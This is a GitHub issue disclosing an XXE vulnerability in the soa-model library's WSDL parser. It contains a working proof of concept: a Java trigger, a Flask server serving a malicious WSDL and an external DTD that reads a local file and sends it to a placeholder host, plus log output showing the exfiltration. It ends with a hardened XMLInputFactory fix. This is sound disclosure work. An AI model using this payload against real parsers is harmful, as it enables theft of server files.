membrane / soa-model

Toolkit and Java API for WSDL, WADL and XML Schema.
http://www.membrane-soa.org/soa-model/
Apache License 2.0

There is an XXE vulnerability in parsing wsdl. #281

Closed yuligesec closed 3 years ago

yuligesec commented 3 years ago

There is an XXE vulnerability in parsing wsdl.

Add the latest version of soa-model-core to pom.xml.

<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core -->
<dependency>
    <groupId>com.predic8</groupId>
    <artifactId>soa-model-core</artifactId>
    <version>1.6.3</version>
</dependency>

The XXE vulnerability appears when fetching and parsing a remote WSDL file.

import com.predic8.wsdl.*;

public class TestXxe {
    public static void main(String[] args) {
        // Parsing a WSDL served by the host below makes the parser resolve the DOCTYPE it contains.
        WSDLParser parser = new WSDLParser();
        Definitions defs = parser.parse("http://ip:10000/testxxeService?wsdl");
    }
}

Construct a server that serves the malicious WSDL file with Flask.

from flask import Flask, Response

app = Flask(__name__)

# Serves the malicious WSDL: its DOCTYPE pulls in an external parameter-entity DTD.
@app.route('/testxxeService')
def catch_all():
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://ip:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

# Serves the external DTD that reads /tmp/123 and sends its content back in a request URL.
@app.route('/data.dtd')
def hello():
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:10000/?filecontent=%file;'>">
%int;
%send;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)

Create a test file /tmp/123:

$ echo 123123 > /tmp/123
$ cat /tmp/123
123123

Run the Java code; the XXE attack succeeds, as the server log shows:

127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -
core/src/main/groovy/com/predic8/schema/Include.groovy, line 42:
def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource)

core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy, line 51:
XMLInputFactory.newInstance().createXMLStreamReader(res)

Reference: https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report. XMLInputFactory allows DTDs to be loaded by default, so there is an XXE vulnerability.
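As an added example (not code from the report or from soa-model): the two `XMLInputFactory.newInstance()` call sites above could be replaced by a factory configured like the one below, which refuses DTD processing and external entity resolution so the parameter-entity chain in the malicious WSDL is never followed. The class name, the helper methods and the sample document (with a placeholder host) are assumptions for this demonstration; the behaviour described in the comments is that of the JDK's built-in StAX implementation.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import java.io.StringReader;

public class HardenedStaxDemo {

    /** Factory configured so DTDs are not processed and external entities are never resolved. */
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        // The %dtd; / %send; trick needs DTD processing; turn it off entirely.
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        // Defence in depth: even where a DTD is processed, never resolve external entities.
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    /** Returns the root element name of the document, or throws if parsing fails. */
    static String rootElement(XMLInputFactory f, String xml) throws XMLStreamException {
        XMLStreamReader r = f.createXMLStreamReader(new StringReader(xml));
        try {
            while (r.hasNext()) {
                if (r.next() == XMLStreamConstants.START_ELEMENT) {
                    return r.getLocalName();
                }
            }
            return null;
        } finally {
            r.close();
        }
    }

    public static void main(String[] args) {
        // Constructed sample with the same shape as the WSDL in the report; the host is a placeholder.
        String evil = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE data [ <!ENTITY % dtd SYSTEM \"http://attacker.invalid/data.dtd\"> %dtd; ]>\n"
            + "<data>&send;</data>";
        try {
            // With SUPPORT_DTD off, %dtd; is never resolved, so no request leaves the JVM.
            System.out.println("root = " + rootElement(hardenedFactory(), evil));
        } catch (XMLStreamException e) {
            // The JDK parser fails on the unprocessed DOCTYPE / undeclared &send; instead of fetching.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Whichever branch the installed StAX implementation takes, the external DTD is not fetched, which is the check to make when verifying a fix for this report.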